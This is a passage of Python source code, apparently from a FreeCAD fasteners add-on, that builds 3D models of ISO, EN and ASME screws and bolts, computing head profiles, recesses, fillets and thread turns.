edge4 = Part.makeLine(Pnt5, Pnt6)
edge5 = Part.Arc(Pnt6, Pnt7, PntR).toShape()
headWire = Part.Wire([edge1, edge2, edge3, edge4, edge5])
if SType == 'ISO2009' or SType == 'ISO2010' or SType == 'ASMEB18.6.3.1A':
if SType == 'ISO2009' or SType == 'ISO2010':
P, a, b, dk_theo, dk_mean, k, n_min, r, t_mean, x = FsData["iso2009def"][ThreadType]
elif SType == 'ASMEB18.6.3.1A':
P, b, dk_theo, dk_mean, k, n_min, r, t_mean = FsData["asmeb18.6.3.1adef"][ThreadType]
dk_max = dk_theo
t_min = t_mean
ht = 0.0 # Head height of flat head
if SType == 'ISO2010':
rf, t_mean, cT, mH, mZ = FsData["Raised_countersunk_def"][ThreadType]
# Lengths and angles for calculation of head rounding
beta = math.asin(dk_mean / 2.0 / rf) # angle of head edge
tan_beta = math.tan(beta)
alpha = beta / 2.0 # half angle
# height of raised head top
ht = rf - (dk_mean / 2.0) / tan_beta
h_arc_x = rf * math.sin(alpha)
h_arc_z = ht - rf + rf * math.cos(alpha)
cham = (dk_theo - dk_mean) / 2.0
rad225 = math.radians(22.5)
rad45 = math.radians(45.0)
rtan = r * math.tan(rad225)
headEnd = k + rtan
if b > l - k - rtan / 2.0 - 1.0 * P:
bmax = l - k - rtan / 2.0 - 1.0 * P
else:
bmax = b
# Head Points
Pnt0 = Base.Vector(0.0, 0.0, ht)
Pnt1 = Base.Vector(dk_mean / 2.0, 0.0, 0.0)
Pnt2 = Base.Vector(dk_mean / 2.0, 0.0, -cham)
Pnt3 = Base.Vector(dia / 2.0 + r - r * math.cos(rad45), 0.0, -k - rtan + r * math.sin(rad45))
# Arc-points
Pnt4 = Base.Vector(dia / 2.0 + r - r * (math.cos(rad225)), 0.0, -k - rtan + r * math.sin(rad225))
PntR = Base.Vector(dia / 2.0, 0.0, -k - rtan)
# PntA = Base.Vector(dia/2.0,0.0,-a_point)
PntT0 = Base.Vector(0.0, 0.0, -k - rtan) # helper point for real thread
if SType == 'ISO2010': # make raised head rounding
Pnt0arc = Base.Vector(h_arc_x, 0.0, h_arc_z)
edge1 = Part.Arc(Pnt0, Pnt0arc, Pnt1).toShape()
else:
edge1 = Part.makeLine(Pnt0, Pnt1) # make flat head
edge2 = Part.makeLine(Pnt1, Pnt2)
edge3 = Part.makeLine(Pnt2, Pnt3)
edgeArc = Part.Arc(Pnt3, Pnt4, PntR).toShape()
headWire = Part.Wire([edge1, edge2, edge3, edgeArc])
# Work out the number of thread half-turns and the thread start position from the thread length and pitch
residue, turns = math.modf((bmax) / P)
halfturns = 2 * int(turns)
if residue < 0.5:
a_point = l - (turns + 1.0) * P
halfturns = halfturns + 1
else:
halfturns = halfturns + 2
a_point = l - (turns + 2.0) * P
# halfturns = halfturns + 2
offSet = headEnd - a_point
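# a_point is the unthreaded shank length below the head and halfturns the
# number of half thread turns; offSet is handed to makeShellthread() further
# down, apparently to line the thread shell up with the plain shank.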
PntA = Base.Vector(dia / 2.0, 0.0, -a_point) # Start of thread
if self.rThread:
edgeZ1 = Part.makeLine(PntR, PntT0)
edgeZ0 = Part.makeLine(PntT0, Pnt0)
aWire = Part.Wire([headWire, edgeZ1, edgeZ0])
else:
# bolt points
PntB1 = Base.Vector(dia / 2.0, 0.0, -l)
PntB2 = Base.Vector(0.0, 0.0, -l)
edgeB2 = Part.makeLine(PntB1, PntB2)
edgeZ0 = Part.makeLine(PntB2, Pnt0)
if a_point <= r:
edgeB1 = Part.makeLine(PntR, PntB1)
aWire = Part.Wire([headWire, edgeB1, edgeB2, edgeZ0])
else:
edgeRA = Part.makeLine(PntR, PntA)
edgeB1 = Part.makeLine(PntA, PntB1)
aWire = Part.Wire([headWire, edgeRA, edgeB1, edgeB2, edgeZ0])
aFace = Part.Face(aWire)
head = aFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# FreeCAD.Console.PrintMessage("the head with revolve: " + str(dia) + "\n")
# Parameter for slot-recess: dk_max, n_min, k, t_min
slot = Part.makePlane(dk_max, n_min, \
Base.Vector(dk_max / 2.0, -n_min / 2.0, ht + 1.0), Base.Vector(0.0, 0.0, -1.0))
slot = slot.extrude(Base.Vector(0.0, 0.0, -t_min - 1.0))
# Part.show(slot)
head = head.cut(slot)
# FreeCAD.Console.PrintMessage("the head cut: " + str(dia) + "\n")
# Part.show(head)
if self.rThread:
rthread = self.makeShellthread(dia, P, halfturns, False, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
# Part.show(rthread)
headFaces = []
if SType == 'ISO2009' or SType == 'ASMEB18.6.3.1A':
for i in range(0, len(head.Faces) - 2):
headFaces.append(head.Faces[i])
headFaces.append(head.Faces[len(head.Faces) - 1])
if SType == 'ISO1580' or SType == 'ISO2010':
for i in range(0, len(head.Faces) - 1):
headFaces.append(head.Faces[i])
for threadFace in rthread.Faces:
headFaces.append(threadFace)
newHeadShell = Part.Shell(headFaces)
# Part.show(newHeadShell)
head = Part.Solid(newHeadShell)
return head
# ISO 7045 Pan head screws with type H or type Z cross recess
# ISO 14583 Hexalobular socket pan head screws
def makeIso7045(self, SType='ISO7045', ThreadType='M6', l=25.0):
dia = self.getDia(ThreadType, False)
# FreeCAD.Console.PrintMessage("the head with l: " + str(l) + "\n")
P, a, b, dk_max, da, k, r, rf, x, cT, mH, mZ = FsData["iso7045def"][ThreadType]
# FreeCAD.Console.PrintMessage("the head with iso: " + str(dk_max) + "\n")
# Lengths and angles for calculation of head rounding
beta = math.asin(dk_max / 2.0 / rf) # angle of head edge
# print 'beta: ', math.degrees(beta)
tan_beta = math.tan(beta)
if SType == 'ISO14583':
tt, A, t_mean = FsData["iso14583def"][ThreadType]
beta_A = math.asin(A / 2.0 / rf) # angle of recess edge
tan_beta_A = math.tan(beta_A)
alpha = (beta_A + beta) / 2.0 # half angle
# print 'alpha: ', math.degrees(alpha)
# height of head edge
he = k - A / 2.0 / tan_beta_A + (dk_max / 2.0) / tan_beta
# print 'he: ', he
h_arc_x = rf * math.sin(alpha)
h_arc_z = k - A / 2.0 / tan_beta_A + rf * math.cos(alpha)
# FreeCAD.Console.PrintMessage("h_arc_z: " + str(h_arc_z) + "\n")
else:
alpha = beta / 2.0 # half angle
# print 'alpha: ', math.degrees(alpha)
# height of head edge
he = k - rf + (dk_max / 2.0) / tan_beta
# print 'he: ', he
h_arc_x = rf * math.sin(alpha)
h_arc_z = k - rf + rf * math.cos(alpha)
# FreeCAD.Console.PrintMessage("h_arc_z: " + str(h_arc_z) + "\n")
if b > l - 1.0 * P:
bmax = l - 1.0 * P
else:
bmax = b
# Work out the number of thread half-turns and the thread start position from the thread length and pitch
residue, turns = math.modf(bmax / P)
halfturns = 2 * int(turns)
if residue < 0.5:
a_point = l - (turns + 1.0) * P
halfturns = halfturns + 1
else:
halfturns = halfturns + 2
a_point = l - (turns + 2.0) * P
# halfturns = halfturns + 2
offSet = r - a_point
# FreeCAD.Console.PrintMessage("The transition at a: " + str(a) + " turns " + str(turns) + "\n")
sqrt2_ = 1.0 / math.sqrt(2.0)
# Head Points
Pnt1 = Base.Vector(h_arc_x, 0.0, h_arc_z)
Pnt2 = Base.Vector(dk_max / 2.0, 0.0, he)
Pnt3 = Base.Vector(dk_max / 2.0, 0.0, 0.0)
Pnt4 = Base.Vector(dia / 2.0 + r, 0.0, 0.0) # start of fillet between head and shank
Pnt5 = Base.Vector(dia / 2.0 + r - r * sqrt2_, 0.0, -r + r * sqrt2_) # arc-point of fillet
Pnt6 = Base.Vector(dia / 2.0, 0.0, -r) # end of fillet
Pnt7 = Base.Vector(dia / 2.0, 0.0, -a_point) # Start of thread
# FreeCAD.Console.PrintMessage("Points defined a_point: " + str(a_point) + "\n")
if SType == 'ISO14583':
# Pnt0 = Base.Vector(0.0,0.0,k-A/4.0)
Pnt0 = Base.Vector(0.0, 0.0, k - A / 8.0)
PntFlat = Base.Vector(A / 8.0, 0.0, k - A / 8.0)
PntCham = Base.Vector(A / 1.99, 0.0, k)
edgeCham0 = Part.makeLine(Pnt0, PntFlat)
edgeCham1 = Part.makeLine(PntFlat, PntCham)
edgeCham2 = Part.Arc(PntCham, Pnt1, Pnt2).toShape()
# edge1 = Part.Wire([edgeCham0,edgeCham1,edgeCham2])
edge1 = Part.Wire([edgeCham0, edgeCham1])
edge2 = Part.makeLine(Pnt2, Pnt3)
edge2 = Part.Wire([edgeCham2, edge2])
# Part.show(edge2)
# Here is the next approach to shorten the head building time
# Make two helper points to create a cutting tool for the
# recess and recess shell.
PntH1 = Base.Vector(A / 1.99, 0.0, 2.0 * k)
PntH2 = Base.Vector(0.0, 0.0, 2.0 * k)
edgeH1 = Part.makeLine(PntCham, PntH1)
edgeH2 = Part.makeLine(PntH1, PntH2)
edgeH3 = Part.makeLine(PntH2, Pnt0)
else:
Pnt0 = Base.Vector(0.0, 0.0, k)
edge1 = Part.Arc(Pnt0, Pnt1, Pnt2).toShape() # make round head
edge2 = Part.makeLine(Pnt2, Pnt3)
# Here is the next approach to shorten the head building time
# Make two helper points to create a cutting tool for the
# recess and recess shell.
PntH1 = Base.Vector(dk_max / 2.0, 0.0, 2.0 * k)
PntH2 = Base.Vector(0.0, 0.0, 2.0 * k)
edgeH1 = Part.makeLine(Pnt2, PntH1)
edgeH2 = Part.makeLine(PntH1, PntH2)
edgeH3 = Part.makeLine(PntH2, Pnt0)
edge3 = Part.makeLine(Pnt3, Pnt4)
edge4 = Part.Arc(Pnt4, Pnt5, Pnt6).toShape()
# FreeCAD.Console.PrintMessage("Edges made h_arc_z: " + str(h_arc_z) + "\n")
# if self.RealThread.isChecked():
if self.rThread:
aWire = Part.Wire([edge2, edge3, edge4])
else:
# bolt points
PntB1 = Base.Vector(dia / 2.0, 0.0, -l)
PntB2 = Base.Vector(0.0, 0.0, -l)
edgeB2 = Part.makeLine(PntB1, PntB2)
if a_point <= (r + 0.00001):
edgeB1 = Part.makeLine(Pnt6, PntB1)
aWire = Part.Wire([edge2, edge3, edge4, edgeB1, edgeB2])
else:
edge5 = Part.makeLine(Pnt6, Pnt7)
edgeB1 = Part.makeLine(Pnt7, PntB1)
aWire = Part.Wire([edge2, edge3, edge4, edge5, edgeB1, edgeB2])
hWire = Part.Wire([edge1, edgeH1, edgeH2, edgeH3]) # Cutter for recess-Shell
hFace = Part.Face(hWire)
hCut = hFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(hWire)
headShell = aWire.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# head = Part.Solid(headShell)
# Part.show(aWire)
# FreeCAD.Console.PrintMessage("the head with revolve: " + str(dia) + "\n")
headFaces = headShell.Faces
if SType == 'ISO14583':
recess, recessShell = self.makeIso10664_3(tt, t_mean, k)
recessShell = recessShell.cut(hCut)
topFace = hCut.Faces[1]
topFace = topFace.cut(recess)
# Part.show(topFace)
# Part.show(recessShell)
# Part.show(headShell)
headFaces.append(topFace.Faces[0])
# headFaces.append(hCut.Faces[2])
else:
# Lengths and angles for calculation of recess positioning
beta_cr = math.asin(mH / 2.0 / rf) # angle of recess edge
tan_beta_cr = math.tan(beta_cr)
# height of cross recess cutting
hcr = k - rf + (mH / 2.0) / tan_beta_cr
# print 'hcr: ', hcr
# Parameter for cross-recess type H: cT, mH
recess, recessShell = self.makeCross_H3(cT, mH, hcr)
recessShell = recessShell.cut(hCut)
topFace = hCut.Faces[0]
topFace = topFace.cut(recess)
# Part.show(topFace)
# Part.show(recessShell)
# Part.show(headShell)
headFaces.append(topFace.Faces[0])
# Part.show(hCut)
headFaces.extend(recessShell.Faces)
# if self.RealThread.isChecked():
if self.rThread:
# head = self.cutIsoThread(head, dia, P, turns, l)
rthread = self.makeShellthread(dia, P, halfturns, False, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
# head = head.fuse(rthread)
# Part.show(rthread)
for threadFace in rthread.Faces:
headFaces.append(threadFace)
newHeadShell = Part.Shell(headFaces)
# Part.show(newHeadShell)
head = Part.Solid(newHeadShell)
return head
# make Cheese head screw
# ISO 1207 slotted screw
# ISO 7048 cross recessed screw
# ISO 14580 Hexalobular socket cheese head screws
def makeIso1207(self, SType='ISO1207', ThreadType='M6', l=25.0):
dia = self.getDia(ThreadType, False)
'''
if '(' in ThreadType:
threadString = ThreadType.lstrip('(M')
dia = float(ThreadType.rstrip(')'))
else:
dia=float(ThreadType.lstrip('M'))
'''
# FreeCAD.Console.PrintMessage("the head with l: " + str(l) + "\n")
if SType == 'ISO1207' or SType == 'ISO14580':
P, a, b, dk, dk_mean, da, k, n_min, r, t_min, x = FsData["iso1207def"][ThreadType]
if SType == 'ISO7048':
P, a, b, dk, dk_mean, da, k, r, x, cT, mH, mZ = FsData["iso7048def"][ThreadType]
if SType == 'ISO14580':
tt, k, A, t_min = FsData["iso14580def"][ThreadType]
# FreeCAD.Console.PrintMessage("the head with iso: " + str(dk) + "\n")
# Length for calculation of head fillet
r_fil = r * 2.0
beta = math.radians(5.0) # angle of cheese head edge
alpha = math.radians(90.0 - (90.0 + 5.0) / 2.0)
tan_beta = math.tan(beta)
# top head diameter without fillet
rK_top = dk / 2.0 - k * tan_beta
fillet_center_x = rK_top - r_fil + r_fil * tan_beta
fillet_center_z = k - r_fil
fillet_arc_x = fillet_center_x + r_fil * math.sin(alpha)
fillet_arc_z = fillet_center_z + r_fil * math.cos(alpha)
# FreeCAD.Console.PrintMessage("rK_top: " + str(rK_top) + "\n")
if b > l - 1.0 * P:
bmax = l - 1.0 * P
else:
bmax = b
# Work out the number of thread half-turns and the thread start position from the thread length and pitch
residue, turns = math.modf(bmax / P)
halfturns = 2 * int(turns)
if residue < 0.5:
a_point = l - (turns + 1.0) * P
halfturns = halfturns + 1
else:
halfturns = halfturns + 2
a_point = l - (turns + 2.0) * P
# halfturns = halfturns + 2
offSet = r - a_point
sqrt2_ = 1.0 / math.sqrt(2.0)
# Head Points
Pnt2 = Base.Vector(fillet_center_x, 0.0, k)
Pnt3 = Base.Vector(fillet_arc_x, 0.0, fillet_arc_z)
Pnt4 = Base.Vector(fillet_center_x + r_fil * math.cos(beta), 0.0, fillet_center_z + r_fil * math.sin(beta))
Pnt5 = Base.Vector(dk / 2.0, 0.0, 0.0)
Pnt6 = Base.Vector(dia / 2.0 + r, 0.0, 0.0) # start of fillet between head and shank
Pnt7 = Base.Vector(dia / 2.0 + r - r * sqrt2_, 0.0, -r + r * sqrt2_) # arc-point of fillet
Pnt8 = Base.Vector(dia / 2.0, 0.0, -r) # end of fillet
Pnt9 = Base.Vector(dia / 2.0, 0.0, -a_point) # Start of thread
# FreeCAD.Console.PrintMessage("Points defined fillet_center_x: " + str(fillet_center_x) + "\n")
if SType == 'ISO14580':
# Pnt0 = Base.Vector(0.0,0.0,k-A/4.0) #Center Point for countersunk
Pnt0 = Base.Vector(0.0, 0.0, k - A / 8.0) # Center Point for flat countersunk
PntFlat = Base.Vector(A / 8.0, 0.0, k - A / 8.0) # End of flat part
Pnt1 = Base.Vector(A / 1.99, 0.0, k) # countersunk edge at head
edgeCham0 = Part.makeLine(Pnt0, PntFlat)
edgeCham1 = Part.makeLine(PntFlat, Pnt1)
edgeCham2 = Part.makeLine(Pnt1, Pnt2)
edge1 = Part.Wire([edgeCham1, edgeCham2]) # make head with countersunk
PntH1 = Base.Vector(A / 1.99, 0.0, 2.0 * k)
else:
Pnt0 = Base.Vector(0.0, 0.0, k)
edge1 = Part.makeLine(Pnt0, Pnt2) # make flat head
edge2 = Part.Arc(Pnt2, Pnt3, Pnt4).toShape()
edge3 = Part.makeLine(Pnt4, Pnt5)
edge4 = Part.makeLine(Pnt5, Pnt6)
edge5 = Part.Arc(Pnt6, Pnt7, Pnt8).toShape()
# FreeCAD.Console.PrintMessage("Edges made fillet_center_z: " + str(fillet_center_z) + "\n")
if SType == 'ISO1207':
# Parameter for slot-recess: dk, n_min, k, t_min
recess = Part.makePlane(dk, n_min, \
Base.Vector(dk / 2.0, -n_min / 2.0, k + 1.0), Base.Vector(0.0, 0.0, -1.0))
recess = recess.extrude(Base.Vector(0.0, 0.0, -t_min - 1.0))
if self.rThread:
Pnt11 = Base.Vector(0.0, 0.0, -r) # helper point for real thread
edgeZ1 = Part.makeLine(Pnt8, Pnt11)
edgeZ0 = Part.makeLine(Pnt11, Pnt0)
aWire = Part.Wire([edge1, edge2, edge3, edge4, edge5, \
edgeZ1, edgeZ0])
else:
# bolt points
PntB1 = Base.Vector(dia / 2.0, 0.0, -l)
PntB2 = Base.Vector(0.0, 0.0, -l)
edgeB2 = Part.makeLine(PntB1, PntB2)
if a_point <= r:
edgeB1 = Part.makeLine(Pnt8, PntB1)
aWire = Part.Wire([edge1, edge2, edge3, edge4, edge5, \
edgeB1, edgeB2])
else:
edge6 = Part.makeLine(Pnt8, Pnt9)
edgeB1 = Part.makeLine(Pnt9, PntB1)
aWire = Part.Wire([edge1, edge2, edge3, edge4, edge5, edge6, \
edgeB1, edgeB2])
aFace = Part.Face(aWire)
head = aFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360.0)
head = head.cut(recess)
# FreeCAD.Console.PrintMessage("the head cut: " + str(dia) + "\n")
# Part.show(head)
if self.rThread:
screwFaces = []
for i in range(0, len(head.Faces) - 1):
screwFaces.append(head.Faces[i])
rthread = self.makeShellthread(dia, P, halfturns, False, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
for threadFace in rthread.Faces:
screwFaces.append(threadFace)
screwShell = Part.Shell(screwFaces)
head = Part.Solid(screwShell)
else:
if self.rThread:
aWire = Part.Wire([edge1, edge2, edge3, edge4, edge5])
else:
# bolt points
PntB1 = Base.Vector(dia / 2.0, 0.0, -l)
PntB2 = Base.Vector(0.0, 0.0, -l)
edgeB2 = Part.makeLine(PntB1, PntB2)
if a_point <= r:
edgeB1 = Part.makeLine(Pnt8, PntB1)
aWire = Part.Wire([edge1, edge2, edge3, edge4, edge5, \
edgeB1, edgeB2])
else:
edge6 = Part.makeLine(Pnt8, Pnt9)
edgeB1 = Part.makeLine(Pnt9, PntB1)
aWire = Part.Wire([edge1, edge2, edge3, edge4, edge5, edge6, \
edgeB1, edgeB2])
# aFace =Part.Face(aWire)
headShell = aWire.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360.0)
# FreeCAD.Console.PrintMessage("the head with revolve: " + str(dia) + "\n")
if SType == 'ISO7048':
# hCut should be just a cylinder
hCut = Part.makeCylinder(fillet_center_x, k, Pnt0)
recess, recessShell = self.makeCross_H3(cT, mH, k)
recessShell = recessShell.cut(hCut)
topFace = headShell.Faces[0].cut(recess)
screwFaces = [topFace.Faces[0]]
screwFaces.extend(recessShell.Faces)
if SType == 'ISO14580':
# Ring-cutter for recess shell
PntH2 = Base.Vector(A / 8.0, 0.0, 2.0 * k)
edgeH1 = Part.makeLine(Pnt1, PntH1)
edgeH2 = Part.makeLine(PntH1, PntH2)
edgeH3 = Part.makeLine(PntH2, PntFlat)
hWire = Part.Wire([edgeCham1, edgeH1, edgeH2, edgeH3]) # Cutter for recess-Shell
hFace = Part.Face(hWire)
hCut = hFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(hWire)
recess, recessShell = self.makeIso10664_3(tt, t_min, k)
recessShell = recessShell.cut(hCut)
topFace = headShell.Faces[0].cut(recess)
screwFaces = [topFace.Faces[0]]
screwFaces.extend(recessShell.Faces)
for i in range(1, len(headShell.Faces)):
screwFaces.append(headShell.Faces[i])
if self.rThread:
# head = self.cutIsoThread(head, dia, P, turns, l)
rthread = self.makeShellthread(dia, P, halfturns, False, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
# head = head.fuse(rthread)
# Part.show(rthread)
for threadFace in rthread.Faces:
screwFaces.append(threadFace)
screwShell = Part.Shell(screwFaces)
head = Part.Solid(screwShell)
return head
# make the ISO 4017 Hex-head-screw
# make the ISO 4014 Hex-head-bolt
def makeIso4017_2(self, SType, ThreadType, l=40.0):
dia = self.getDia(ThreadType, False)
# FreeCAD.Console.PrintMessage("the head with l: " + str(l) + "\n")
if SType == 'ISO4017':
P, c, dw, e, k, r, s = FsData["iso4017head"][ThreadType]
# Work out the number of thread half-turns from the thread length and pitch
residue, turns = math.modf((l - 1 * P) / P)
halfturns = 2 * int(turns)
if SType == 'ISO4014':
P, b1, b2, b3, c, dw, e, k, r, s = FsData["iso4014head"][ThreadType]
if l <= 125.0:
b = b1
else:
if l <= 200.0:
b = b2
else:
b = b3
# Work out the number of thread half-turns from the thread length and pitch
residue, turns = math.modf(b / P)
halfturns = 2 * int(turns)
if SType == 'ASMEB18.2.1.6':
b, P, c, dw, e, k, r, s = FsData["asmeb18.2.1.6def"][ThreadType]
if l > 6 * 25.4:
b += 6.35
# Work out the number of thread half-turns from the thread length and pitch
residue, turns = math.modf((b) / P)
halfturns = 2 * int(turns)
if residue < 0.5:
a = l - (turns + 1.0) * P
halfturns = halfturns + 1
else:
halfturns = halfturns + 2
a = l - (turns + 2.0) * P
# halfturns = halfturns + 2
offSet = r - a
sqrt2_ = 1.0 / math.sqrt(2.0)
cham = (e - s) * math.sin(math.radians(15)) # needed for chamfer at head top
# Head Points Usage of k, s, cham, c, dw, dia, r, a
# FreeCAD.Console.PrintMessage("the head with halfturns: " + str(halfturns) + "\n")
Pnt0 = Base.Vector(0.0, 0.0, k)
Pnt2 = Base.Vector(s / 2.0, 0.0, k)
Pnt3 = Base.Vector(s / math.sqrt(3.0), 0.0, k - cham)
Pnt4 = Base.Vector(s / math.sqrt(3.0), 0.0, c)
Pnt5 = Base.Vector(dw / 2.0, 0.0, c)
Pnt6 = Base.Vector(dw / 2.0, 0.0, 0.0)
Pnt7 = Base.Vector(dia / 2.0 + r, 0.0, 0.0) # start of fillet between head and shank
Pnt8 = Base.Vector(dia / 2.0 + r - r * sqrt2_, 0.0, -r + r * sqrt2_) # arc-point of fillet
Pnt9 = Base.Vector(dia / 2.0, 0.0, -r) # end of fillet
Pnt10 = Base.Vector(dia / 2.0, 0.0, -a) # Start of thread
edge1 = Part.makeLine(Pnt0, Pnt2)
edge2 = Part.makeLine(Pnt2, Pnt3)
edge3 = Part.makeLine(Pnt3, Pnt4)
edge4 = Part.makeLine(Pnt4, Pnt5)
edge5 = Part.makeLine(Pnt5, Pnt6)
edge6 = Part.makeLine(Pnt6, Pnt7)
edge7 = Part.Arc(Pnt7, Pnt8, Pnt9).toShape()
# create cutting tool for hexagon head
# Parameters: width across flats s, head height k, outer circle diameter (here s * 2.0)
extrude = self.makeHextool(s, k, s * 2.0)
# if self.RealThread.isChecked():
if self.rThread:
Pnt11 = Base.Vector(0.0, 0.0, -r) # helper point for real thread
edgeZ1 = Part.makeLine(Pnt9, Pnt11)
edgeZ0 = Part.makeLine(Pnt11, Pnt0)
aWire = Part.Wire([edge1, edge2, edge3, edge4, edge5, edge6, edge7, \
edgeZ1, edgeZ0])
aFace = Part.Face(aWire)
head = aFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360.0)
# FreeCAD.Console.PrintMessage("the head with revolve: " + str(dia) + "\n")
# Part.show(extrude)
head = head.cut(extrude)
# FreeCAD.Console.PrintMessage("the head cut: " + str(dia) + "\n")
# Part.show(head)
headFaces = []
for i in range(18):
headFaces.append(head.Faces[i])
if dia < 3.0 or dia > 5.0:
rthread = self.makeShellthread(dia, P, halfturns, True, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a - 2.0 * P))
# rthread.translate(Base.Vector(0.0, 0.0,-2.0*P))
# Part.show(rthread)
for tFace in rthread.Faces:
headFaces.append(tFace)
headShell = Part.Shell(headFaces)
head = Part.Solid(headShell)
else:
rthread = self.makeShellthread(dia, P, halfturns, False, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a - 2.0 * P))
# rthread.translate(Base.Vector(0.0, 0.0,-2.0*P))
# Part.show(rthread)
for tFace in rthread.Faces:
headFaces.append(tFace)
headShell = Part.Shell(headFaces)
head = Part.Solid(headShell)
cyl = self.cutChamfer(dia, P, l)
# FreeCAD.Console.PrintMessage("before the end of the cut: " + str(dia) + "\n")
head = head.cut(cyl)
else:
# bolt points
cham_t = P * math.sqrt(3.0) / 2.0 * 17.0 / 24.0
PntB0 = Base.Vector(0.0, 0.0, -a)
PntB1 = Base.Vector(dia / 2.0, 0.0, -l + cham_t)
PntB2 = Base.Vector(dia / 2.0 - cham_t, 0.0, -l)
PntB3 = Base.Vector(0.0, 0.0, -l)
edgeB1 = Part.makeLine(Pnt10, PntB1)
edgeB2 = Part.makeLine(PntB1, PntB2)
edgeB3 = Part.makeLine(PntB2, PntB3)
edgeZ0 = Part.makeLine(PntB3, Pnt0)
if a <= r:
edgeB1 = Part.makeLine(Pnt9, PntB1)
aWire = Part.Wire([edge1, edge2, edge3, edge4, edge5, edge6, edge7, \
edgeB1, edgeB2, edgeB3, edgeZ0])
else:
edge8 = Part.makeLine(Pnt9, Pnt10)
edgeB1 = Part.makeLine(Pnt10, PntB1)
aWire = Part.Wire([edge1, edge2, edge3, edge4, edge5, edge6, edge7, edge8, \
edgeB1, edgeB2, edgeB3, edgeZ0])
aFace = Part.Face(aWire)
head = aFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360.0)
# FreeCAD.Console.PrintMessage("the head with revolve: " + str(dia) + "\n")
# Part.show(extrude)
head = head.cut(extrude)
# FreeCAD.Console.PrintMessage("the head cut: " + str(dia) + "\n")
return head
# EN 1662 Hex-head-bolt with flange - small series
# EN 1665 Hexagon bolts with flange, heavy series
def makeEN1662_2(self, SType='EN1662', ThreadType='M8', l=25.0):
dia = self.getDia(ThreadType, False)
# FreeCAD.Console.PrintMessage("the head with l: " + str(l) + "\n")
if SType == 'EN1662':
P, b0, b1, b2, b3, c, dc, dw, e, k, kw, f, r1, s = FsData["en1662def"][ThreadType]
elif SType == 'EN1665':
P, b0, b1, b2, b3, c, dc, dw, e, k, kw, f, r1, s = FsData["en1665def"][ThreadType]
elif SType == 'ASMEB18.2.1.8':
b0, P, c, dc, kw, r1, s = FsData["asmeb18.2.1.8def"][ThreadType]
b = b0
if l < b0:
b = l - 2 * P
elif SType != 'ASMEB18.2.1.8':
if l <= 125.0:
b = b1
else:
if l <= 200.0:
b = b2
else:
b = b3
# FreeCAD.Console.PrintMessage("the head with isoEN1662: " + str(c) + "\n")
cham = s * (2.0 / math.sqrt(3.0) - 1.0) * math.sin(math.radians(25)) # needed for chamfer at head top
# Work out the number of thread half-turns and the thread start position from the thread length and pitch
residue, turns = math.modf(b / P)
halfturns = 2 * int(turns)
if residue < 0.5:
a_point = l - (turns + 1.0) * P
halfturns = halfturns + 1
else:
halfturns = halfturns + 2
a_point = l - (turns + 2.0) * P
# halfturns = halfturns + 2
offSet = r1 - a_point
sqrt2_ = 1.0 / math.sqrt(2.0)
# Flange is made with a radius of c
beta = math.radians(25.0)
tan_beta = math.tan(beta)
# Calculation of Arc points of flange edge using dc and c
arc1_x = dc / 2.0 - c / 2.0 + (c / 2.0) * math.sin(beta)
arc1_z = c / 2.0 + (c / 2.0) * math.cos(beta)
hF = arc1_z + (arc1_x - s / 2.0) * tan_beta # height of flange at center
kmean = arc1_z + (arc1_x - s / math.sqrt(3.0)) * tan_beta + kw * 1.1 + cham
# kmean = k * 0.95
# Hex-Head Points
# FreeCAD.Console.PrintMessage("the head with math a: " + str(a_point) + "\n")
PntH0 = Base.Vector(0.0, 0.0, kmean * 0.9)
PntH1 = Base.Vector(s / 2.0 * 0.8 - r1 / 2.0, 0.0, kmean * 0.9)
PntH1a = Base.Vector(s / 2.0 * 0.8 - r1 / 2.0 + r1 / 2.0 * sqrt2_, 0.0,
kmean * 0.9 + r1 / 2.0 - r1 / 2.0 * sqrt2_)
PntH1b = Base.Vector(s / 2.0 * 0.8, 0.0, kmean * 0.9 + r1 / 2.0)
PntH2 = Base.Vector(s / 2.0 * 0.8, 0.0, kmean - r1)
PntH2a = Base.Vector(s / 2.0 * 0.8 + r1 - r1 * sqrt2_, 0.0, kmean - r1 + r1 * sqrt2_)
PntH2b = Base.Vector(s / 2.0 * 0.8 + r1, 0.0, kmean)
PntH3 = Base.Vector(s / 2.0, 0.0, kmean)
# PntH4 = Base.Vector(s/math.sqrt(3.0),0.0,kmean-cham) #s/math.sqrt(3.0)
# PntH5 = Base.Vector(s/math.sqrt(3.0),0.0,c)
# PntH6 = Base.Vector(0.0,0.0,c)
edgeH1 = Part.makeLine(PntH0, PntH1)
edgeH2 = Part.Arc(PntH1, PntH1a, PntH1b).toShape()
edgeH3 = Part.makeLine(PntH1b, PntH2)
edgeH3a = Part.Arc(PntH2, PntH2a, PntH2b).toShape()
edgeH3b = Part.makeLine(PntH2b, PntH3)
hWire = Part.Wire([edgeH1, edgeH2, edgeH3, edgeH3a, edgeH3b])
topShell = hWire.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(hWire)
# Part.show(topShell)
# create a cutter ring to generate the chamfer at the top of the hex
chamHori = s / math.sqrt(3.0) - s / 2.0
PntC1 = Base.Vector(s / 2.0 - chamHori, 0.0, kmean + kmean)
PntC2 = Base.Vector(s / math.sqrt(3.0) + chamHori, 0.0, kmean + kmean)
PntC3 = Base.Vector(s / 2.0 - chamHori, 0.0, kmean + cham)
